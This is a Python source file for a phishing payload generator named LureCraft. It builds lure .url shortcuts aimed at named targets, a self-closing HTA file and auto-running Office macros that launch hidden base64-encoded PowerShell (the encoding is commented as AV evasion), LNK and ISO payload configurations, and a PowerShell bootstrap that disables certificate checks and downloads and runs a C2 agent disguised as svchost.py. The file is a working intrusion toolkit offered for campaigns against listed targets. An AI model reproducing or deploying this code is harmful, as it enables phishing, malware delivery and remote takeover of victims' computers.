"""
Payload Generator
Generate phishing payloads (.url files, HTA, macros, etc.)
"""

import os
from pathlib import Path
from typing import Dict, List, Any, Optional
import base64
import structlog

logger = structlog.get_logger()


class PayloadGenerator:
    """
    Generate phishing payloads for initial access campaigns
    """

    def __init__(self):
        self.templates_dir = Path(__file__).parent / "templates"

    def generate_url_file(
        self,
        target_name: str,
        payload_url: str,
        icon_url: Optional[str] = None,
        template: str = "performance_review"
    ) -> str:
        """
        Generate malicious .url file

        Args:
            target_name: Target's name (for personalization)
            payload_url: URL to payload (e.g., C2 agent download)
            icon_url: Optional icon URL
            template: Template name

        Returns:
            .url file content
        """
        logger.info("Generating .url payload", target=target_name, template=template)

        templates = {
            "performance_review": {
                "title": f"{target_name} - Performance Review Q4 2025",
                "description": "Confidential - Performance Review Document"
            },
            "bonus_notification": {
                "title": f"{target_name} - Annual Bonus Notification",
                "description": "HR Department - Bonus Information"
            },
            "security_alert": {
                "title": "URGENT: Security Alert - Action Required",
                "description": "IT Security - Immediate Action Required"
            },
            "invoice": {
                "title": "Invoice #2025-Q4-1234 - Payment Required",
                "description": "Accounts Payable - Invoice Pending"
            },
            "document_share": {
                "title": f"Shared Document from {target_name}",
                "description": "SharePoint - Document Access"
            }
        }

        template_data = templates.get(template, templates["performance_review"])

        # Build .url file content
        url_content = f"""[InternetShortcut]
URL={payload_url}
WorkingDirectory=%TEMP%
"""

        if icon_url:
            url_content += f"IconFile={icon_url}\nIconIndex=0\n"

        # Add metadata comments
        url_content += f"""
; Generated by LureCraft
; Template: {template}
; Target: {target_name}
; Description: {template_data['description']}
"""

        return url_content

    def generate_hta_payload(
        self,
        payload_command: str,
        title: str = "Document Viewer",
        icon: str = "winword.exe"
    ) -> str:
        """
        Generate HTA (HTML Application) payload

        Args:
            payload_command: PowerShell or cmd command to execute
            title: Window title
            icon: Icon to display

        Returns:
            HTA file content
        """
        logger.info("Generating HTA payload", title=title)

        # Encode payload
        encoded_payload = base64.b64encode(payload_command.encode()).decode()

        hta_content = f"""<!DOCTYPE html>
<html>
<head>
    <title>{title}</title>
    <HTA:APPLICATION
        ID="DocumentViewer"
        APPLICATIONNAME="{title}"
        BORDER="none"
        CAPTION="no"
        SHOWINTASKBAR="no"
        SINGLEINSTANCE="yes"
        WINDOWSTATE="minimize"
    />
    <script language="VBScript">
        Sub Window_OnLoad
            ' Close window immediately
            self.close

            ' Decode and execute payload
            Dim shell, cmd
            Set shell = CreateObject("WScript.Shell")

            ' Base64 encoded payload
            cmd = "powershell -NoP -NonI -W Hidden -Enc {encoded_payload}"

            shell.Run cmd, 0, False

            ' Exit
            self.close
        End Sub
    </script>
</head>
<body>
    <p>Loading document...</p>
</body>
</html>
"""

        return hta_content

    def generate_macro_document(
        self,
        payload_command: str,
        document_type: str = "word"
    ) -> str:
        """
        Generate VBA macro code for Office documents

        Args:
            payload_command: Command to execute
            document_type: word, excel, or powerpoint

        Returns:
            VBA macro code
        """
        logger.info("Generating macro payload", document_type=document_type)

        # Encode payload to avoid AV detection
        encoded = base64.b64encode(payload_command.encode()).decode()

        macro_code = f"""' Generated by LureCraft
' This macro executes on document open

Sub AutoOpen()
    ExecutePayload
End Sub

Sub Document_Open()
    ExecutePayload
End Sub

Sub Workbook_Open()
    ExecutePayload
End Sub

Private Sub ExecutePayload()
    On Error Resume Next

    Dim shell As Object
    Dim cmd As String

    Set shell = CreateObject("WScript.Shell")

    ' Decode and execute
    cmd = "powershell -NoP -NonI -W Hidden -Enc {encoded}"

    shell.Run cmd, 0, False

    Set shell = Nothing
End Sub
"""

        return macro_code

    def generate_lnk_payload(
        self,
        target_path: str,
        arguments: str = "",
        icon_path: Optional[str] = None,
        working_dir: str = "%TEMP%"
    ) -> Dict[str, Any]:
        """
        Generate .lnk (shortcut) payload configuration

        Args:
            target_path: Target executable
            arguments: Command arguments
            icon_path: Icon file path
            working_dir: Working directory

        Returns:
            LNK configuration dict
        """
        logger.info("Generating LNK payload configuration", target=target_path)

        return {
            "target_path": target_path,
            "arguments": arguments,
            "icon_path": icon_path or target_path,
            "working_directory": working_dir,
            "description": "Generated by LureCraft",
            "window_style": 7,  # Minimized
            "hotkey": "NONE"
        }

    def generate_iso_payload_structure(
        self,
        payload_files: List[Dict[str, str]]
    ) -> Dict[str, Any]:
        """
        Generate ISO payload structure

        Args:
            payload_files: List of files to include in ISO

        Returns:
            ISO structure configuration
        """
        logger.info("Generating ISO payload structure", file_count=len(payload_files))

        return {
            "volume_label": "DOCUMENT_FILES",
            "files": payload_files,
            "autorun": {
                "enabled": True,
                "icon": "document.ico",
                "action": "Open Documents"
            }
        }

    def generate_bootstrap_script(
        self,
        c2_server: str,
        c2_port: int = 443,
        use_tls: bool = True
    ) -> str:
        """
        Generate PowerShell bootstrap script

        Args:
            c2_server: C2 server address
            c2_port: C2 port
            use_tls: Use HTTPS

        Returns:
            PowerShell bootstrap script
        """
        protocol = "https" if use_tls else "http"
        agent_url = f"{protocol}://{c2_server}:{c2_port}/payloads/agent.py"

        script = f"""# LureCraft Bootstrap Script
# Downloads and executes C2 agent

$ErrorActionPreference = "SilentlyContinue"

# Download agent
$agentUrl = "{agent_url}"
$agentPath = "$env:TEMP\\svchost.py"

try {{
    # Bypass SSL validation
    [System.Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}}

    # Download
    $webClient = New-Object System.Net.WebClient
    $webClient.DownloadFile($agentUrl, $agentPath)

    # Execute
    python $agentPath --server {c2_server} --port {c2_port}

}} catch {{
    # Silent fail
}}
"""

        return script

    def generate_payload_package(
        self,
        campaign_name: str,
        targets: List[Dict[str, str]],
        payload_url: str,
        template: str = "performance_review",
        output_dir: Optional[str] = None
    ) -> Dict[str, Any]:
        """
        Generate complete payload package for campaign

        Args:
            campaign_name: Campaign name
            targets: List of target dicts (name, email, etc.)
            payload_url: Payload download URL
            template: Template to use
            output_dir: Output directory

        Returns:
            Package manifest
        """
        if not output_dir:
            output_dir = f"/tmp/lurecraft_{campaign_name}"

        output_path = Path(output_dir)
        output_path.mkdir(parents=True, exist_ok=True)

        logger.info(
            "Generating payload package",
            campaign=campaign_name,
            targets=len(targets),
            output=output_dir
        )

        manifest = {
            "campaign": campaign_name,
            "generated_at": "2025-11-16",
            "template": template,
            "targets": [],
            "files": []
        }

        for target in targets:
            target_name = target.get("name", "User")
            target_email = target.get("email", "unknown@example.com")

            # Generate .url file
            url_content = self.generate_url_file(
                target_name=target_name,
                payload_url=payload_url,
                template=template
            )

            # Save file
            filename = f"{target_name.replace(' ', '_')}_{template}.url"
            file_path = output_path / filename

            with open(file_path, "w") as f:
                f.write(url_content)

            manifest["targets"].append({
                "name": target_name,
                "email": target_email,
                "file": filename
            })

            manifest["files"].append(str(file_path))

        logger.info("Payload package generated", files=len(manifest["files"]))

        return manifest
